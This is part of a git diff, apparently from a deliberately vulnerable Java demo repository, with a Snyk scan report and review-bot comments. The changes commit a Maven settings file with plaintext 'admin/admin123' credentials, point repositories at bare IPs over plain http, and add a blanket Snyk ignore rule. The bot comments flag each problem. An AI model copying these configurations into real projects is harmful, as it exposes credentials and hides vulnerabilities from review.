+ "org.apache.logging.log4j:log4j-core@2.17.1"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/settings.xml b/log4shell-goof/log4shell-server/settings.xml
new file mode 100644
index 0000000000..7e4e710df2
--- /dev/null
+++ b/log4shell-goof/log4shell-server/settings.xml
@@ -0,0 +1,13 @@
+
+
+
+ privatedeps
+ admin
+ admin123
+
+
+
+
\ No newline at end of file
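Review bot: The new settings.xml commits what appears to be a Maven `<server>` entry for `privatedeps` with a plaintext username `admin` and password `admin123` (the XML tags look stripped in this rendering, so the element structure is inferred). Once a credential is in git history it has to be treated as exposed and rotated on the Nexus side, whether or not the file is removed later. Keep settings.xml out of the repository (ignore it and provide it on the CI runner), and reference the secret through environment interpolation, e.g. `<password>${env.NEXUS_PASSWORD}</password>` (variable name is an example), or through Maven's `settings-security.xml` master-password mechanism (`mvn --encrypt-password`). The `privatedeps` id matches the repository declared in todolist-core/pom.xml later in this patch, which is served over plain http, so the password would also travel in cleartext on every resolution.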
diff --git a/testDOcker b/testDOcker
new file mode 100644
index 0000000000..64205d7d4d
--- /dev/null
+++ b/testDOcker
@@ -0,0 +1,6 @@
+FROM debian:11-slim
+
+From python@sha256:603879aeff06df23f0d392a19f7ce02aa85e14e6b4d25fd9647b116e0cb93467
+
+RUN apt-get update
+RUN apt install linux-libc-dev
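Review bot: `RUN apt install linux-libc-dev` on the last line will fail in a non-interactive build because `apt` prompts for confirmation and no `-y` is given; `apt` also warns that it has no stable CLI for scripts, so `apt-get` is the right tool here. Putting `apt-get update` in its own layer means a cached package index is reused on later rebuilds and the install resolves stale versions, which silently defeats patching. Suggested replacement for the two RUN lines: `RUN apt-get update && apt-get install -y --no-install-recommends linux-libc-dev && rm -rf /var/lib/apt/lists/*`. The second `From python@sha256:…` line starts a new build stage, so the `debian:11-slim` stage above it is discarded and the apt commands run against the python image; if that is intended, a comment such as `# first stage intentionally unused; final image is the digest-pinned python base` would make it clear, and the casing should match (`FROM`).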
diff --git a/todolist-goof/pom.xml b/todolist-goof/test-pom.xml
similarity index 100%
rename from todolist-goof/pom.xml
rename to todolist-goof/test-pom.xml
diff --git a/todolist-goof/todolist-core/.snyk b/todolist-goof/todolist-core/.snyk
new file mode 100644
index 0000000000..53762a6404
--- /dev/null
+++ b/todolist-goof/todolist-core/.snyk
@@ -0,0 +1,19 @@
+# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.
+version: v1.25.1
+# ignores vulnerabilities until expiry date; change duration by modifying expiry date
+ignore:
+ 'snyk:lic:pip:certifi:MPL-2.0':
+ - '*':
+ reason: None given
+ expires: '2026-06-19T20:36:54.553Z'
+ 'io.github.snyk:todolist-core@0.0.1-SNAPSHOT':
+ - '*':
+ reason: None Given
+ expires: 2025-02-07T16:10:18.094Z
+ created: 2025-01-08T16:10:18.099Z
+ 'snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0':
+ - '*':
+ reason: None Given
+ expires: 2025-02-07T16:11:01.062Z
+ created: 2025-01-08T16:11:01.065Z
+patch: {}
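Review bot: The ignore rule for `'io.github.snyk:todolist-core@0.0.1-SNAPSHOT'` with a `'*'` path and `reason: None Given` suppresses every finding reachable from the project's own root module, which is a blanket mute rather than a triaged exception, and none of the three entries records a justification. The second and third entries were created on 2025-01-08 with a thirty-day `expires` of 2025-02-07, so those ignores have likely lapsed already; if so they are no-ops and should be removed or re-justified with a fresh expiry rather than left in place. A one-line comment per entry naming the finding and the compensating control, e.g. `# LGPL-2.0 on hibernate-core: accepted by license review, see <ticket-id>` (placeholder), would make the file auditable. The timestamp quoting is also inconsistent (`'2026-06-19T20:36:54.553Z'` quoted, the others bare) and is worth normalizing.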
diff --git a/todolist-goof/todolist-core/pom.xml b/todolist-goof/todolist-core/pom.xml
index cd5bc869f1..ac0c454ccc 100644
--- a/todolist-goof/todolist-core/pom.xml
+++ b/todolist-goof/todolist-core/pom.xml
@@ -13,12 +13,12 @@
privatedeps
snapshots
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://35.171.191.69:8081/nexus/content/repositories/snapshots
privatedeps
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://35.171.191.69:8081/nexus/content/repositories/releases
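Review bot: Both repository URLs on the `+` lines point at a bare IP over plain `http://`, so dependency resolution for `privatedeps` runs over unauthenticated transport — an on-path party could substitute an artifact, and the server credentials committed in settings.xml earlier in this patch would be sent in the clear on every build. Maven 3.8.1 and later block external HTTP repositories by default, so this will also need an explicit mirror override to work at all on a current toolchain. Prefer `https://` with a hostname rather than an IP, e.g. `https://<nexus-host>/nexus/content/repositories/releases` (placeholder host), and consider moving the repository definitions into settings.xml or a mirror so a host change does not require a code commit. The `<url>` elements appear stripped in this rendering, so the element structure is inferred.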
@@ -47,7 +47,7 @@
org.springframework
spring-aspects
${spring.version}
-
+